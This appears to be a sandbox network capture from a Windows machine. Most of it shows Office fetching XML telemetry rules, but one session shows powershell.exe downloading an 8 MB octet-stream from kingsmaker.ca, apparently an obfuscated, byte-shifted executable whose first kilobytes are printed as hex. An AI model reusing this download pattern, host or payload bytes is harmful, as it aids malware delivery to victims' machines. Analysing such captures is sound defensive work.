                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            74192.168.2.54979613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:08 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:08 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:08 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 427
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                            x-ms-request-id: 5810e7a8-301e-0000-3f91-3feecc000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073108Z-174f78459688l8rvhC1EWRtzr00000000c50000000007gnc
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:08 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            75192.168.2.549797104.21.75.1704437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:08 UTC332OUTGET /file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb6 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            2024-11-29 07:31:09 UTC1115INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:09 GMT
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Length: 8351232
                                                                                                                            Connection: close
                                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iv0R25mkCTvJf1IXjytCmjzI3YG2x3gMU2XYm1SYkeGXqUpsA0ZfoEKbfHRcGH6CUW%2B1W1D%2FKDyV3skCIb7kNwr7id0fWb3b6UblGtZPz4OfPX6QxMDlpReb%2FwE79aqjJQ8z1Jhrb3Wk"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22073&min_rtt=929&rtt_var=29129&sent=16250&recv=7810&lost=0&retrans=0&sent_bytes=23049890&recv_bytes=150663&delivery_rate=51477501&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e57a7b7743a3-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1573&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=970&delivery_rate=1772920&cwnd=220&unsent_bytes=0&cid=68c6c5ab3bd97fe4&ts=1010&x=0"
                                                                                                                            2024-11-29 07:31:09 UTC254INData Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01
                                                                                                                            Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef
                                                                                                                            2024-11-29 07:31:09 UTC1369INData Raw: 23 01 0a 03 0f 28 01 d5 46 01 01 47 38 01 01 15 16 01 e1 b7 0a 01 01 11 01 01 01 01 01 41 00 01 01 01 01 11 01 01 01 03 01 01 07 01 01 01 01 01 01 01 07 01 01 01 01 01 01 01 01 71 99 01 01 05 01 01 01 01 01 01 02 01 61 80 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 01 01 11 01 01 01 11 29 90 01 59 01 01 01 69 29 90 01 55 00 01 01 01 41 99 01 8b 04 01 01 01 71 92 01 45 ce 05 01 01 01 01 01 01 01 01 01 01 51 99 01 cd 11 01 01 31 8f 87 01 1d 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 91 87 01 29 01 01 01 f1 8d 87 01 41 00 01 01 01 01 01 01 01 01 01 01 01 11 5e 01 01 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 2f 75 64 79 75 01 01 01 79 26 0d 01 01
                                                                                                                            Data Ascii: #(FG8Aqa)Yi)UAqEQ1)A^/udyuy&
                                                                                                                            2024-11-29 07:31:09 UTC1369INData Raw: 00 c2 49 8a d1 e8 be d5 25 01 49 8c 04 99 d7 4f 01 49 8c 0c 88 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a3 d5 25 01 49 8c 04 d2 d7 4f 01 49 8c 0c c5 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 84 d5 25 01 49 8c 04 07 d6 4f 01 49 8c 0c f6 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 69 d5 25 01 49 8c 04 20 d6 4f 01 49 8c 0c 13 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4a d5 25 01 49 8c 04 1d d6 4f 01 49 8c 0c 0c d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2f d5 25 01 49 8c 04 26 d6 4f 01 49 8c 0c 19 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 10 d5 25 01 49 8c 04 8b d6 4f 01 49 8c 0c 7a d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f5 d2 25 01 49 8c 04 9c d6 4f 01 49 8c 0c 8f d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d6 d2 25 01 49 8c 04 a9 d6 4f 01 49 8c 0c 98 d6 4f
                                                                                                                            Data Ascii: I%IOIOI8tI%IOIOI8tI%IOIOI8tIi%I OIOI8tIJ%IOIOI8tI/%I&OIOI8tI%IOIzOI8tI%IOIOI8tI%IOIO
                                                                                                                            2024-11-29 07:31:09 UTC1369INData Raw: 6d ce 25 01 49 8c 04 04 db 4f 01 49 8c 0c f7 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4e ce 25 01 49 8c 04 11 db 4f 01 49 8c 0c 00 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 33 ce 25 01 49 8c 04 3a db 4f 01 49 8c 0c 2d db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 ce 25 01 49 8c 04 2f db 4f 01 49 8c 0c 1e db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 cf 25 01 49 8c 04 20 db 4f 01 49 8c 0c 13 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da cf 25 01 49 8c 04 15 db 4f 01 49 8c 0c 04 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf cf 25 01 49 8c 04 16 db 4f 01 49 8c 0c 09 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 cf 25 01 49 8c 04 5b db 4f 01 49 8c 0c 4a db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 cf 25 01 49 8c 04 4c db 4f 01 49 8c 0c 3f db 4f 01 49 82 38 01 74
                                                                                                                            Data Ascii: m%IOIOI8tIN%IOIOI8tI3%I:OI-OI8tI%I/OIOI8tI%I OIOI8tI%IOIOI8tI%IOIOI8tI%I[OIJOI8tI%ILOI?OI8t
                                                                                                                            2024-11-29 07:31:09 UTC542INData Raw: 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c8 25 01 49 8c 04 96 57 90 01 49 8a 01 49 8c 0c a4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c8 25 01 49 8c 04 8e 57 90 01 49 8a 01 49 8c 0c 74 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c8 25 01 49 8c 04 76 57 90 01 49 8a 01 49 8c 0c 5c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 5e 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 46 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 26 57 90 01 49 8a 01 49 8c 0c 2c
                                                                                                                            Data Ascii: OI8tI%IWIIOI8tI%IWIItOI8tI%IvWII\OI8tI%I^WIIDOI8tIg%IFWII,OI8tIG%I6WIIOI8tI'%I6WIIDOI8tI%I&WII,
                                                                                                                            2024-11-29 07:31:09 UTC1369INData Raw: dc cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c6 25 01 49 8c 04 ae 54 90 01 49 8a 01 49 8c 0c c4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c6 25 01 49 8c 04 96 54 90 01 49 8a 01 49 8c 0c ac cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c6 25 01 49 8c 04 86 54 90 01 49 8a 01 49 8c 0c 9c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c6 25 01 49 8c 04 76 54 90 01 49 8a 01 49 8c 0c 84 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c6 25 01 49 8c 04 66 54 90 01 49 8a 01 49 8c 0c 6c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c6 25 01 49 8c 04 4e 54 90 01 49 8a 01 49 8c 0c 54 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c6 25 01 49 8c 04 36 54 90 01 49 8a 01 49 8c 0c 3c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c7 25 01 49 8c 04 26 54 90 01 49 8a 01 49 8c
                                                                                                                            Data Ascii: OI8tI%ITIIOI8tI%ITIIOI8tI%ITIIOI8tIg%IvTIIOI8tIG%IfTIIlOI8tI'%INTIITOI8tI%I6TII<OI8tI%I&TII
                                                                                                                            2024-11-29 07:31:09 UTC1369INData Raw: 01 49 8a 01 49 8c 0c 74 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c3 25 01 49 8c 04 d6 53 90 01 49 8a 01 49 8c 0c 5c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c3 25 01 49 8c 04 be 53 90 01 49 8a 01 49 8c 0c 44 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c3 25 01 49 8c 04 a6 53 90 01 49 8a 01 49 8c 0c 2c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c3 25 01 49 8c 04 8e 53 90 01 49 8a 01 49 8c 0c 14 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c0 25 01 49 8c 04 76 53 90 01 49 8a 01 49 8c 0c fc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c0 25 01 49 8c 04 5e 53 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c0 25 01 49 8c 04 46 53 90 01 49 8a 01 49 8c 0c cc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c0 25 01 49 8c 04 2e 53
                                                                                                                            Data Ascii: IItOI8tIg%ISII\OI8tIG%ISIIDOI8tI'%ISII,OI8tI%ISIIOI8tI%IvSIIOI8tI%I^SIIOI8tI%IFSIIOI8tI%I.S
                                                                                                                            2024-11-29 07:31:09 UTC1369INData Raw: 01 49 8c 04 fe 4e 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 bc 25 01 49 8c 04 e6 4e 90 01 49 8a 01 49 8c 0c b4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bd 25 01 49 8c 04 ce 4e 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bd 25 01 49 8c 04 c6 4e 90 01 49 8a 01 49 8c 0c 8c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bd 25 01 49 8c 04 b6 4e 90 01 49 8a 01 49 8c 0c 7c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bd 25 01 49 8c 04 ae 4e 90 01 49 8a 01 49 8c 0c 64 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bd 25 01 49 8c 04 9e 4e 90 01 49 8a 01 49 8c 0c 4c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bd 25 01 49 8c 04 96 4e 90 01 49 8a 01 49 8c 0c 34 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bd
                                                                                                                            Data Ascii: INIIOI8tI%INIIOI8tI%INIIOI8tI%INIIOI8tI%INII|OI8tI%INIIdOI8tIg%INIILOI8tIG%INII4OI8tI'
                                                                                                                            2024-11-29 07:31:09 UTC1369INData Raw: 49 8a d1 e8 c7 b6 25 01 49 8c 04 86 4f 90 01 49 8a 01 49 8c 0c 84 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 6c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 5c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b6 25 01 49 8c 04 8e 4f 90 01 49 8a 01 49 8c 0c 4c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b6 25 01 49 8c 04 7e 4f 90 01 49 8a 01 49 8c 0c 34 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b6 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c 1c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b6 25 01 49 8c 04 6e 4f 90 01 49 8a 01 49 8c 0c 04 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b7 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c ec c3 4f 01 49 82 38 01 74 00
                                                                                                                            Data Ascii: I%IOIIOI8tI%IOIIlOI8tI%IOII\OI8tIg%IOIILOI8tIG%I~OII4OI8tI'%IvOIIOI8tI%InOIIOI8tI%IVOIIOI8t
                                                                                                                            2024-11-29 07:31:09 UTC1369INData Raw: 49 82 38 01 74 00 c2 49 8a d1 e8 67 b3 25 01 49 8c 04 8e 4a 90 01 49 8a 01 49 8c 0c ec be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b3 25 01 49 8c 04 76 4a 90 01 49 8a 01 49 8c 0c e4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b3 25 01 49 8c 04 5e 4a 90 01 49 8a 01 49 8c 0c cc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b3 25 01 49 8c 04 46 4a 90 01 49 8a 01 49 8c 0c b4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b0 25 01 49 8c 04 2e 4a 90 01 49 8a 01 49 8c 0c 9c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b0 25 01 49 8c 04 1e 4a 90 01 49 8a 01 49 8c 0c 84 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b0 25 01 49 8c 04 06 4a 90 01 49 8a 01 49 8c 0c 94 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b0 25 01 49 8c 04 ee 4b 90 01 49 8a 01 49 8c 0c 7c be 4f
                                                                                                                            Data Ascii: I8tIg%IJIIOI8tIG%IvJIIOI8tI'%I^JIIOI8tI%IFJIIOI8tI%I.JIIOI8tI%IJIIOI8tI%IJIIOI8tI%IKII|O


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            76192.168.2.54979813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:09 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:09 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 502
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                            x-ms-request-id: 592f830c-001e-005a-4566-40c3d0000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073109Z-174f7845968j6t2phC1EWRcfe80000000zv0000000001k55
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:10 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            77192.168.2.54979913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:09 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:09 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 407
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                            x-ms-request-id: 5e4c1b71-501e-000a-3f04-420180000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073109Z-174f7845968glpgnhC1EWR7uec0000000zng00000000cmx4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:10 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            78192.168.2.54980013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:10 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 474
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                            x-ms-request-id: 8b6e778c-d01e-005a-3367-407fd9000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073110Z-174f7845968cdxdrhC1EWRg0en0000000zk0000000005nxb
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:10 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            79192.168.2.54980113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:10 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 408
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                            x-ms-request-id: 97970dc3-901e-008f-6c91-3f67a6000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073110Z-174f78459685m244hC1EWRgp2c0000000zgg000000001ypx
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
